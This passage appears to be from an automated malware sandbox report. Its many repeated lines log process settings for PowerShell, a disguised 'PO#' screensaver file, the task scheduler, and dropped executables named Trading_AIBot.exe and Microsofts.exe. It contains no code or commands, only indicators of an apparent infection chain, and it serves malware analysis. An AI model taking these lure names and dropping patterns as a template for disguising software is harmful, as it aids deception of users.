                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
